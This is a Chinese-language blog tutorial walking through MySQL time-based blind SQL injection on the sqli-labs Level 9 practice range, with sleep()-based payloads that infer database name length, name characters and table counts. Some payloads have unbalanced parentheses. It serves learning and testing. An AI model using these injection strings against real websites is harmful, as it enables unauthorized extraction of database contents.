百度360必应搜狗淘宝本站头条
mysql distinctjenkins官网mysql 子查询vba splitpython list sort
当前位置:网站首页 > IT技术 > 正文

黑客小白的进阶之路——SQL注入之MySQL时间注入

wptr33 2025-06-28 17:12 16 浏览

MySQL时间盲注

课前小问题

如果说uniom注入用不了,布尔盲注也用不了,无论你插入到什么样的sql语句,它的页面都没有反应,这个时候该怎么办呢?

这个时候我们就可以去用到时间盲注了。

那什么是时间盲注呢?

时间盲注:当布尔型注入没有结果(页面显示正常)的时候,我们很难去判断注入的代码是否被执行,也可以说到底这个注入点存不存在,这个时候布尔型注入就无法发挥自己的作用,基于时间的盲注就出现了,所谓基于时间的盲注,就是根据web页面响应的时间差来判断该页面是否存在sql注入点。

使用场景

1.union注入用不了,布尔注入也用不了。

演示:sqli-labs 靶场第9关

这里一直没反应,那我们这个时候就要用时间盲注了

时间盲注操作方式

A.先去判断是否存在注入

B.在去判断注入类型:字符型/数字型/搜索型。

Sleep函数,我们怎么通过sleep函数来判断呢?既然它是一个时间盲注会根据这个页面的一个时间差来去判断。


延迟5秒响应,因为and左边要满足右边也要满足,那么我们就去执行一把,存在注入,必然这也响应5秒,如果不响应慢5秒的话,那么它就不可能存在注入。

C.判断能使用的注入方式,这里不能使用union注入\布尔盲注

?id=1'and 1=1 %23  页面会显正常
?id=1'and 1=2 %23  页面会显示不正常?id=1'and sleep(5)%23发现页面延迟了5秒钟响应证明sleep被带入数据库做了查询。所以是存在时间盲注的。 

D.首先获取数据库名称的长度

?id=1'and if ((length(database())>7)),sleep(5),1)%23 延时5秒
?id=1'and if ((length(database())>8)),sleep(5),1)%23 不延时5秒


说明数据库名称长度为7位

E.获取数据库的名称

?id=1'and if ((ascii(substr(database(),1,1))>n),sleep(5),1)%23

大于114,不大于115,说明当前使用的数据库名称第一位的ascii值为115,所以查看ASCII表得为字符s

F.获取表数量

?id=1'and if ((select count(*)from information_schema.tables where table_schema=database())>4,sleep(5),1)--+延迟5秒

?id=1'and if ((select count(*)from information_schema.tables where table_schema=database())>5,sleep(5),1)--+不延迟5秒

G.获取后面替换expr1就行了,依次寻找名字、字段...

相关推荐

redis的八种使用场景

前言:redis是我们工作开发中,经常要打交道的,下面对redis的使用场景做总结介绍也是对redis举报的功能做梳理。缓存Redis最常见的用途是作为缓存,用于加速应用程序的响应速度。...

基于Redis的3种分布式ID生成策略

在分布式系统设计中,全局唯一ID是一个基础而关键的组件。随着业务规模扩大和系统架构向微服务演进,传统的单机自增ID已无法满足需求。高并发、高可用的分布式ID生成方案成为构建可靠分布式系统的必要条件。R...

基于OpenWrt系统路由器的模式切换与网页设计

摘要:目前商用WiFi路由器已应用到多个领域,商家通过给用户提供一个稳定免费WiFi热点达到吸引客户、提升服务的目标。传统路由器自带的Luci界面提供了工厂模式的Web界面,用户可通过该界面配置路...

这篇文章教你看明白 nginx-ingress 控制器

主机nginx一般nginx做主机反向代理(网关)有以下配置...

如何用redis实现注册中心

一句话总结使用Redis实现注册中心:服务注册...

爱可可老师24小时热门分享(2020.5.10)

No1.看自己以前写的代码是种什么体验?No2.DooM-chip!国外网友SylvainLefebvre自制的无CPU、无操作码、无指令计数器...No3.我认为CS学位可以更好,如...

Apportable:拯救程序员,IOS一秒变安卓

摘要:还在为了跨平台使用cocos2d-x吗,拯救objc程序员的奇葩来了,ApportableSDK:FreeAndroidsupportforcocos2d-iPhone。App...

JAVA实现超买超卖方案汇总,那个最适合你,一篇文章彻底讲透

以下是几种Java实现超买超卖问题的核心解决方案及代码示例,针对高并发场景下的库存扣减问题:方案一:Redis原子操作+Lua脚本(推荐)//使用Redis+Lua保证原子性publicbo...

3月26日更新 快速施法自动施法可独立设置

2016年3月26日DOTA2有一个79.6MB的更新主要是针对自动施法和快速施法的调整本来内容不多不少朋友都有自动施法和快速施法的困扰英文更新日志一些视觉BUG修复就不翻译了主要翻译自动施...

Redis 是如何提供服务的

在刚刚接触Redis的时候,最想要知道的是一个’setnameJhon’命令到达Redis服务器的时候,它是如何返回’OK’的?里面命令处理的流程如何,具体细节怎么样?你一定有问过自己...

lua _G、_VERSION使用

到这里我们已经把lua基础库中的函数介绍完了,除了函数外基础库中还有两个常量,一个是_G,另一个是_VERSION。_G是基础库本身,指向自己,这个变量很有意思,可以无限引用自己,最后得到的还是自己,...

China's top diplomat to chair third China-Pacific Island countries foreign ministers' meeting

BEIJING,May21(Xinhua)--ChineseForeignMinisterWangYi,alsoamemberofthePoliticalBureau...

移动工作交流工具Lua推出Insights数据分析产品

Lua是一个适用于各种职业人士的移动交流平台,它在今天推出了一项叫做Insights的全新功能。Insights是一个数据平台,客户可以在上面实时看到员工之间的交流情况,并分析这些情况对公司发展的影响...

Redis 7新武器:用Redis Stack实现向量搜索的极限压测

当传统关系型数据库还在为向量相似度搜索的性能挣扎时,Redis7的RedisStack...

Nginx/OpenResty详解,Nginx Lua编程,重定向与内部子请求

重定向与内部子请求Nginx的rewrite指令不仅可以在Nginx内部的server、location之间进行跳转,还可以进行外部链接的重定向。通过ngx_lua模块的Lua函数除了能实现Nginx...

一周热门
最近发表
标签列表
赣ICP备2024040476号-12